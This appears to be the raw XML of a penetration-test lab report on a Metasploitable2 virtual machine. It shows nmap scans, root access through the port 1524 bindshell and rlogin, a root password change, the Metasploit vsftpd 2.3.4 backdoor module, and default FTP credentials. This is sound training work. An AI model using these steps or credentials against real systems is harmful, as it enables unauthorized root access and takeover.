    <w:p w14:paraId="0FAD0233" w14:textId="49BFB0E0" w:rsidR="008E51FC" w:rsidRDefault="004417A4" w:rsidP="004417A4">
      <w:r>
        <w:t xml:space="preserve">192.168.254.1    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29665F58" w14:textId="72346690" w:rsidR="004417A4" w:rsidRDefault="00495A6A" w:rsidP="004417A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C2C0DAC" wp14:editId="0B450744">
            <wp:extent cx="5736590" cy="1804670"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="17536779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6590" cy="1804670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E2B2C" w14:textId="1EBCB573" w:rsidR="00495A6A" w:rsidRDefault="00607B81" w:rsidP="004417A4">
      <w:r w:rsidRPr="00607B81">
        <w:t xml:space="preserve">192.168.254.2 is the default gateway as seen by the </w:t>
      </w:r>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00607B81">
        <w:t>ali VM</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A05B1" w14:textId="54B34796" w:rsidR="00607B81" w:rsidRDefault="00AE72C7" w:rsidP="004417A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F7D26C3" wp14:editId="2291F6BC">
            <wp:extent cx="5730875" cy="731520"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1203958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731520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C16FAA" w14:textId="5373BF6C" w:rsidR="00ED0FA5" w:rsidRDefault="00A93DE3" w:rsidP="004417A4">
      <w:r w:rsidRPr="00A93DE3">
        <w:t xml:space="preserve">Ip address that ends in 254 is the DHCP server for the virtual network verified by running the command sudo dhclient -d -nw -eth0   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC06852" w14:textId="2AEB7A59" w:rsidR="00A93DE3" w:rsidRDefault="00ED0FA5" w:rsidP="004417A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4036D91D" wp14:editId="10FFE6C6">
            <wp:extent cx="5736590" cy="2329180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1837972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6590" cy="2329180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2126E" w14:textId="7596D109" w:rsidR="00ED0FA5" w:rsidRDefault="00254EC9" w:rsidP="004417A4">
      <w:r w:rsidRPr="00254EC9">
        <w:t xml:space="preserve">Ip </w:t>
      </w:r>
      <w:r>
        <w:t>addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00254EC9">
        <w:t xml:space="preserve"> 192.168.254.186 &amp; 187 are the only other hosts running</w:t>
      </w:r>
      <w:r w:rsidR="00E01F34">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0A0E5C" w14:textId="537E3960" w:rsidR="009E78F3" w:rsidRDefault="009E78F3" w:rsidP="009E78F3">
      <w:r>
        <w:t xml:space="preserve">Port scan  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C394A3" w14:textId="7BC60A8F" w:rsidR="009E78F3" w:rsidRDefault="009E78F3" w:rsidP="009E78F3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">nmap -sV -O 192.168.254.186   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29F6FA" w14:textId="77777777" w:rsidR="009E78F3" w:rsidRDefault="009E78F3" w:rsidP="009E78F3">
      <w:r>
        <w:t xml:space="preserve">Breaking down the command    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F48C6B" w14:textId="77777777" w:rsidR="009E78F3" w:rsidRDefault="009E78F3" w:rsidP="009E78F3">
      <w:r>
        <w:t xml:space="preserve">-sV will help determine the service running   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A12B48" w14:textId="37CBF02E" w:rsidR="0052288E" w:rsidRDefault="009E78F3" w:rsidP="009E78F3">
      <w:r>
        <w:t xml:space="preserve">-O will try to </w:t>
      </w:r>
      <w:r w:rsidR="0052288E">
        <w:t>identify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the OS running on the target.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0399590A" w14:textId="4089AB63" w:rsidR="0052288E" w:rsidRDefault="00D308AE" w:rsidP="00D308AE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C0009C" wp14:editId="66CF7A09">
            <wp:extent cx="5194300" cy="5657850"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="12097429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4300" cy="5657850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2400F221" w14:textId="48DF4FF3" w:rsidR="006A30D1" w:rsidRDefault="00347CDD" w:rsidP="006A30D1">
      <w:r w:rsidRPr="00347CDD">
        <w:t>nmap -s</w:t>
      </w:r>
      <w:r w:rsidR="00241320">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00347CDD">
        <w:t xml:space="preserve"> -O -oA meta 192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582BA4CB" w14:textId="0AA53E58" w:rsidR="008A7F30" w:rsidRDefault="008A7F30" w:rsidP="006A30D1">
      <w:r>
        <w:t xml:space="preserve">-sC </w:t>
      </w:r>
      <w:r w:rsidRPr="008A7F30">
        <w:t xml:space="preserve">  -sC: equivalent to --script=default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEBE3A0" w14:textId="77777777" w:rsidR="00347CDD" w:rsidRDefault="00347CDD" w:rsidP="00347CDD">
      <w:r>
        <w:t xml:space="preserve">-sV will help determine the service running   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C80EB" w14:textId="57885215" w:rsidR="00347CDD" w:rsidRDefault="00347CDD" w:rsidP="00347CDD">
      <w:r>
        <w:t xml:space="preserve">-O will try to identify the OS running on the target.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4A8B1" w14:textId="77777777" w:rsidR="009A01E6" w:rsidRDefault="009A01E6" w:rsidP="00347CDD"/>
    <w:p w14:paraId="2A7EDB07" w14:textId="7650DDC2" w:rsidR="00D308AE" w:rsidRDefault="00D308AE" w:rsidP="00D308AE">
      <w:r>
        <w:t>A few things to note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298871F" w14:textId="77777777" w:rsidR="00D76D9B" w:rsidRDefault="00D308AE" w:rsidP="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc155092361"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port 1524</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="00F42691">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313E10EE" w14:textId="29F2CC68" w:rsidR="00D308AE" w:rsidRDefault="00F42691" w:rsidP="00D308AE">
      <w:r w:rsidRPr="00F42691">
        <w:t xml:space="preserve">I noticed 1524 was open and got straight in using telnet  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BB5FA3" w14:textId="7BE90318" w:rsidR="00D308AE" w:rsidRDefault="001E446A" w:rsidP="001E446A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6751838E" wp14:editId="30064746">
            <wp:extent cx="5121275" cy="1920240"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3810"/>
            <wp:docPr id="8784509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275" cy="1920240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0397F733" w14:textId="056EAEB0" w:rsidR="00C90525" w:rsidRDefault="00F05071" w:rsidP="009973A1">
      <w:r w:rsidRPr="00F05071">
        <w:t xml:space="preserve">From there I could capture the authorized keys for root  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5348AB7F" w14:textId="3D88F5AE" w:rsidR="00C90525" w:rsidRDefault="00C90525" w:rsidP="009973A1">
      <w:r>
        <w:t xml:space="preserve">I was able to move around the system and execute commands </w:t>
      </w:r>
      <w:r w:rsidR="00FB5467">
        <w:t>Flagged as</w:t>
      </w:r>
      <w:r w:rsidR="00E54950">
        <w:t xml:space="preserve"> bindshell</w:t>
      </w:r>
      <w:r w:rsidR="00FB5467">
        <w:t xml:space="preserve"> “metasploit shell”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453AE75E" w14:textId="576D55BB" w:rsidR="00C90525" w:rsidRDefault="00C90525" w:rsidP="00C90525">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26289799" wp14:editId="734FCCB6">
            <wp:extent cx="5029835" cy="2719070"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="720777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835" cy="2719070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A67ECFA" w14:textId="77777777" w:rsidR="00E17435" w:rsidRDefault="00CA1453" w:rsidP="00E17435">
      <w:r w:rsidRPr="00CA1453">
        <w:t xml:space="preserve">Moreover, ports 513, 513, and 514 are open, known as "r" services if they are misconfigured, they could allow remote login.  These ports were also discovered within the GVM report available click here Metasploitable2-Linux.pdf for more </w:t>
      </w:r>
      <w:r>
        <w:t>informatio</w:t>
      </w:r>
      <w:r w:rsidR="00E17435">
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E9A890" w14:textId="5BA197E0" w:rsidR="002F07FC" w:rsidRDefault="002F07FC" w:rsidP="00E17435">
      <w:r>
        <w:t>Easily exploited</w:t>
      </w:r>
      <w:r w:rsidR="004E6E8E">
        <w:t xml:space="preserve"> by running rlogin -</w:t>
      </w:r>
      <w:r w:rsidR="00190C6A">
        <w:t>l root 192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26116A83" w14:textId="1979D769" w:rsidR="002F07FC" w:rsidRDefault="002F07FC" w:rsidP="00E17435">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72499BDA" wp14:editId="3F6F3914">
            <wp:extent cx="5731510" cy="3161665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="195536917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69178" name="Picture 10"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161665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F7E01C" w14:textId="17C90EEC" w:rsidR="00190C6A" w:rsidRDefault="00190C6A" w:rsidP="00E17435">
      <w:r>
        <w:t>From here I was able to change the password of root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6320CC" w14:textId="0EEE21D5" w:rsidR="00A7228D" w:rsidRDefault="00A7228D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60949542" w14:textId="77777777" w:rsidR="00A7228D" w:rsidRDefault="00A7228D" w:rsidP="00E17435"/>
    <w:p w14:paraId="38B0A936" w14:textId="2B53D4B4" w:rsidR="00BD308A" w:rsidRPr="008314C5" w:rsidRDefault="00BD308A" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc155092362"/>
      <w:r w:rsidRPr="008314C5">
        <w:t xml:space="preserve">Exploitng Port 21 </w:t>
      </w:r>
      <w:r w:rsidR="002F6D85">
        <w:t>FTP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="3069E9E5" w14:textId="539B5B3D" w:rsidR="00333131" w:rsidRDefault="00BD308A" w:rsidP="00E17435">
      <w:r w:rsidRPr="00BD308A">
        <w:t>Running vs</w:t>
      </w:r>
      <w:r w:rsidR="00142AB4">
        <w:t>ft</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD308A">
        <w:t xml:space="preserve">pd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020B2AC5" w14:textId="34F7C101" w:rsidR="00333131" w:rsidRDefault="00333131" w:rsidP="00E17435">
      <w:r>
        <w:t>Nmap scan results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E89E82" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>1/tcp   open  ftp         vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215CE06" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|_ftp-anon: Anonymous FTP login allowed (FTP code 230)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D8C22" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t xml:space="preserve">| ftp-syst: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1645A090" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t xml:space="preserve">|   STAT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082D6E3C" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>| FTP server status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EAB6EF" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      Connected to 192.168.254.182</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3478BF13" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      Logged in as ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174703FC" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      TYPE: ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70AA59" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      No session bandwidth limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F43DCF7" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      Session timeout in seconds is 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980D842" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      Control connection is plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF51E6F" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      Data connections will be plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D8CF3" w14:textId="77777777" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|      vsFTPd 2.3.4 - secure, fast, stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381631C6" w14:textId="63350D3C" w:rsidR="009B2A1F" w:rsidRDefault="009B2A1F" w:rsidP="009B2A1F">
      <w:r>
        <w:t>|_End of status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545EAA19" w14:textId="2335FC2A" w:rsidR="00BD308A" w:rsidRDefault="009D555B" w:rsidP="00E17435">
      <w:r>
        <w:t>Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B1145" w14:textId="58B26FD0" w:rsidR="00142AB4" w:rsidRDefault="00142AB4" w:rsidP="00E17435">
      <w:r w:rsidRPr="00BD308A">
        <w:t xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71553F7F" w14:textId="6917A4A8" w:rsidR="009D555B" w:rsidRDefault="009D555B" w:rsidP="009D555B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B14B339" wp14:editId="742C64A6">
            <wp:extent cx="5376672" cy="443484"/>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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5376672" cy="443484"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843CCFF" w14:textId="77777777" w:rsidR="004B0430" w:rsidRDefault="004B0430" w:rsidP="004B0430">
      <w:r>
        <w:t xml:space="preserve">Now set the remote host   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B78A61" w14:textId="53E7DE95" w:rsidR="00393B96" w:rsidRDefault="004B0430" w:rsidP="004B0430">
      <w:r>
        <w:t xml:space="preserve">set RHOST  192.168.254.186   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ABACC1" w14:textId="140A96C7" w:rsidR="00BD308A" w:rsidRDefault="00393B96" w:rsidP="00E17435">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51090C19" wp14:editId="1E49E609">
            <wp:extent cx="5730875" cy="841375"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="15846342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841375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6477A1C9" w14:textId="2CB76482" w:rsidR="00393B96" w:rsidRDefault="002A63CB" w:rsidP="00E17435">
      <w:r w:rsidRPr="002A63CB">
        <w:t xml:space="preserve">Now we are ready to break something, enter “run”   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D15DBAD" w14:textId="1B0C380A" w:rsidR="002A63CB" w:rsidRDefault="00580FC9" w:rsidP="00580FC9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B0ECC4F" wp14:editId="0C9A6B1F">
            <wp:extent cx="5736590" cy="2084705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10540731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6590" cy="2084705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48116CB6" w14:textId="15EB02EF" w:rsidR="007A5D93" w:rsidRDefault="007A5D93" w:rsidP="007A5D93">
      <w:r>
        <w:t xml:space="preserve">Verified access by </w:t>
      </w:r>
      <w:r w:rsidR="00E7387F">
        <w:t>running whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC5C8A4" w14:textId="67AF1D35" w:rsidR="00A451C2" w:rsidRDefault="00A451C2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44006E18" w14:textId="77777777" w:rsidR="00A451C2" w:rsidRDefault="00A451C2" w:rsidP="007A5D93"/>
    <w:p w14:paraId="78AE5AA5" w14:textId="4C33F0B5" w:rsidR="00DB6252" w:rsidRDefault="00DB6252" w:rsidP="00DB6252">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc155092363"/>
      <w:r>
        <w:t xml:space="preserve">Port 2121 </w:t>
      </w:r>
      <w:r w:rsidR="00A315C1" w:rsidRPr="00A315C1">
        <w:t>NVT: FTP Brute Force Logins Reporting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="256294B6" w14:textId="0B867A53" w:rsidR="00A315C1" w:rsidRDefault="00A315C1" w:rsidP="00A315C1">
      <w:r w:rsidRPr="00A315C1">
        <w:t>It was possible to login into the remote FTP server using weak/known credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE3162" w14:textId="375AC5AC" w:rsidR="00A451C2" w:rsidRDefault="00A451C2" w:rsidP="00A315C1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres:postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DED48AD" w14:textId="2259C822" w:rsidR="00C512CD" w:rsidRDefault="00C512CD" w:rsidP="00A315C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="695F789F" wp14:editId="1EBE0E44">
            <wp:extent cx="5731510" cy="3625850"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1633805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5987" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3625850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2785D3C8" w14:textId="3239A8D1" w:rsidR="00A451C2" w:rsidRDefault="00860812" w:rsidP="00A315C1">
      <w:r w:rsidRPr="00860812">
        <w:t>service:service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7D938D" w14:textId="5973A9E5" w:rsidR="00860812" w:rsidRDefault="00240DBF" w:rsidP="00A315C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45499C52" wp14:editId="752BFB1F">
            <wp:extent cx="5731510" cy="3625850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="907521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1058" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3625850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDF8AC6" w14:textId="01ACEB01" w:rsidR="00240DBF" w:rsidRDefault="00026B0A" w:rsidP="00A315C1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>user:user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4891A053" w14:textId="0C33D12F" w:rsidR="00026B0A" w:rsidRDefault="00026B0A" w:rsidP="00A315C1">
      <w:r w:rsidRPr="00026B0A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AECB0F2" wp14:editId="5F01D750">
            <wp:extent cx="5731510" cy="3625850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="845139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39457" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3625850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0888C294" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>Vulnerability Insight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D601E" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>The following devices are / software is known to be aected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D02CB" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>- CVE-2001-1594: Codonics printer FTP service as used in GE Healthcare eNTEGRA P&amp;R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE0D973" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>- CVE-2013-7404: GE Healthcare Discovery NM 750b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002DC7E" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>- CVE-2017-8218: vsftpd on TP-Link C2 and C20i devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D1A973" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>- CVE-2018-19063, CVE-2018-19064: Foscam C2 and Opticam i5 devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E7081" w14:textId="77777777" w:rsidR="00B72D0D" w:rsidRDefault="00B72D0D" w:rsidP="00B72D0D">
      <w:r>
        <w:t>Note: As the VT 'FTP Brute Force Logins' (OID: 1.3.6.1.4.1.25623.1.0.108717) might run into</w:t>
      </w:r>
    </w:p>
